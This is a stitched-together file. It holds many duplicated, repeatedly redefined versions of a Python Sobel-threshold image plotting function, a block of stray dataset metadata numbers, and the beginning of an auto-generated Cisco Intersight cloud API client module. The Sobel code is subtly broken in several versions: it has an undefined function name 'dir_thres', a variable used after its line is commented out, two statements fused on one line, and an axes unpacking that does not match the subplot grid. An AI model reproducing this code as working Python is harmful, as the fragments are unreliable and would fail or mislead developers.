image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, (ax1, ax2, ax3, ax4, ax5, ax6) = plt.subplots(2, 3, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(dir_binary, cmap="gray")
ax6.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2, 3, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(dir_binary, cmap="gray")
ax6.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
def sobel_plus_hsv_output(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=mag_thresh)
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=mag_thresh)
dir_binary = dir_thres(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
from main import *
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
from main import *
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=mag_thresh)
dir_binary = dir_thres(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
#mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=mag_thresh)
dir_binary = dir_thres(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
#mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=mag_thresh)
dir_binary = dir_thresh(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
from main import *
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=mag_thresh)
dir_binary = dir_thresh(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5, s_thresh=(170, 255), sx_thresh=(20, 100), x_thresh=(20, 100), y_thresh=(20, 100), mag_thresh=(30, 100), dir_thresh=(0.7, 1.3)):
image = pipeline(inp_img, s_thresh=s_thresh, sx_thresh=sx_thresh)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=x_thresh)grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=y_thresh)
mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=mag_thresh)
dir_binary = dir_thresh(image, sobel_kernel=ksize, thresh=dir_thresh)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, ((ax1, ax2, ax3, ax4), (ax5, ax6, ax7, ax8)) = plt.subplots(2, 4, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(gradx, cmap="gray")
ax4.imshow(grady, cmap="gray")
ax5.imshow(mag_binary, cmap="gray")
ax6.imshow(dir_binary, cmap="gray")
ax7.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
return combined
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
exit()
| 44.552326
| 169
| 0.685458
| 3,638
| 22,989
| 4.095107
| 0.032435
| 0.064975
| 0.094509
| 0.109276
| 0.939522
| 0.930192
| 0.919184
| 0.918647
| 0.912136
| 0.910726
| 0
| 0.052168
| 0.156162
| 22,989
| 515
| 170
| 44.638835
| 0.71581
| 0
| 0
| 0.880753
| 0
| 0
| 0.019535
| 0.001445
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.018828
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c222e262b3c2b7b11346e165629d2e69b71b5eaf
| 308,546
|
py
|
Python
|
intersight/api/cloud_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/api/cloud_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/api/cloud_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.api_client import ApiClient, Endpoint as _Endpoint
from intersight.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from intersight.model.cloud_aws_billing_unit import CloudAwsBillingUnit
from intersight.model.cloud_aws_billing_unit_response import CloudAwsBillingUnitResponse
from intersight.model.cloud_aws_key_pair import CloudAwsKeyPair
from intersight.model.cloud_aws_key_pair_response import CloudAwsKeyPairResponse
from intersight.model.cloud_aws_network_interface import CloudAwsNetworkInterface
from intersight.model.cloud_aws_network_interface_response import CloudAwsNetworkInterfaceResponse
from intersight.model.cloud_aws_organizational_unit import CloudAwsOrganizationalUnit
from intersight.model.cloud_aws_organizational_unit_response import CloudAwsOrganizationalUnitResponse
from intersight.model.cloud_aws_security_group import CloudAwsSecurityGroup
from intersight.model.cloud_aws_security_group_response import CloudAwsSecurityGroupResponse
from intersight.model.cloud_aws_subnet import CloudAwsSubnet
from intersight.model.cloud_aws_subnet_response import CloudAwsSubnetResponse
from intersight.model.cloud_aws_virtual_machine import CloudAwsVirtualMachine
from intersight.model.cloud_aws_virtual_machine_response import CloudAwsVirtualMachineResponse
from intersight.model.cloud_aws_volume import CloudAwsVolume
from intersight.model.cloud_aws_volume_response import CloudAwsVolumeResponse
from intersight.model.cloud_aws_vpc import CloudAwsVpc
from intersight.model.cloud_aws_vpc_response import CloudAwsVpcResponse
from intersight.model.cloud_collect_inventory import CloudCollectInventory
from intersight.model.cloud_regions import CloudRegions
from intersight.model.cloud_regions_response import CloudRegionsResponse
from intersight.model.cloud_sku_container_type import CloudSkuContainerType
from intersight.model.cloud_sku_container_type_response import CloudSkuContainerTypeResponse
from intersight.model.cloud_sku_database_type import CloudSkuDatabaseType
from intersight.model.cloud_sku_database_type_response import CloudSkuDatabaseTypeResponse
from intersight.model.cloud_sku_instance_type import CloudSkuInstanceType
from intersight.model.cloud_sku_instance_type_response import CloudSkuInstanceTypeResponse
from intersight.model.cloud_sku_network_type import CloudSkuNetworkType
from intersight.model.cloud_sku_network_type_response import CloudSkuNetworkTypeResponse
from intersight.model.cloud_sku_region_rate_cards import CloudSkuRegionRateCards
from intersight.model.cloud_sku_region_rate_cards_response import CloudSkuRegionRateCardsResponse
from intersight.model.cloud_sku_volume_type import CloudSkuVolumeType
from intersight.model.cloud_sku_volume_type_response import CloudSkuVolumeTypeResponse
from intersight.model.cloud_tfc_agentpool import CloudTfcAgentpool
from intersight.model.cloud_tfc_agentpool_response import CloudTfcAgentpoolResponse
from intersight.model.cloud_tfc_organization import CloudTfcOrganization
from intersight.model.cloud_tfc_organization_response import CloudTfcOrganizationResponse
from intersight.model.cloud_tfc_workspace import CloudTfcWorkspace
from intersight.model.cloud_tfc_workspace_response import CloudTfcWorkspaceResponse
from intersight.model.error import Error
class CloudApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_cloud_collect_inventory(
self,
cloud_collect_inventory,
**kwargs
):
"""Create a 'cloud.CollectInventory' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cloud_collect_inventory(cloud_collect_inventory, async_req=True)
>>> result = thread.get()
Args:
cloud_collect_inventory (CloudCollectInventory): The 'cloud.CollectInventory' resource to create.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
if_none_match (str): For methods that apply server-side changes, If-None-Match used with the * value can be used to create a resource not known to exist, guaranteeing that another resource creation didn't happen before, losing the data of the previous put. The request will be processed only if the eventually existing resource's ETag doesn't match any of the values listed. Otherwise, the status code 412 (Precondition Failed) is used. The asterisk is a special value representing any resource. It is only useful when creating a resource, usually with PUT, to check if another resource with the identity has already been created before. The comparison with the stored ETag uses the weak comparison algorithm, meaning two resources are considered identical if the content is equivalent - they don't have to be identical byte for byte.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudCollectInventory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['cloud_collect_inventory'] = \
cloud_collect_inventory
return self.call_with_http_info(**kwargs)
self.create_cloud_collect_inventory = _Endpoint(
settings={
'response_type': (CloudCollectInventory,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/CollectInventories',
'operation_id': 'create_cloud_collect_inventory',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'cloud_collect_inventory',
'if_match',
'if_none_match',
],
'required': [
'cloud_collect_inventory',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'cloud_collect_inventory':
(CloudCollectInventory,),
'if_match':
(str,),
'if_none_match':
(str,),
},
'attribute_map': {
'if_match': 'If-Match',
'if_none_match': 'If-None-Match',
},
'location_map': {
'cloud_collect_inventory': 'body',
'if_match': 'header',
'if_none_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_cloud_collect_inventory
)
def __get_cloud_aws_billing_unit_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsBillingUnit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_billing_unit_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsBillingUnit
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_billing_unit_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsBillingUnit,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsBillingUnits/{Moid}',
'operation_id': 'get_cloud_aws_billing_unit_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_billing_unit_by_moid
)
def __get_cloud_aws_billing_unit_list(
self,
**kwargs
):
"""Read a 'cloud.AwsBillingUnit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_billing_unit_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
